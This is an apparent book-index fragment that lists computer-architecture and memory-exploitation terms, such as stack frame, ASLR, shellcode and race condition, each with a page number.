data bus, 17
address bus, 17
stack, 21
address space layout randomization, 54
NUL, 13
swap partition, 17
signal handler, 68
prolog, 27
virtual memory management, 17
return to .text section, 51
return to the standard library, 65
calling convention, 93
shellcode, 16
Register, 16
time of check/time of use, 95
process, 52
thread, 98
Instruction set, 18
integer overflow, 101
Race condition, 95
serialization, 99
last in, first out, 21
microprocessor, 13
shell, 61
frame, 27
stack frame, 30
line break, 13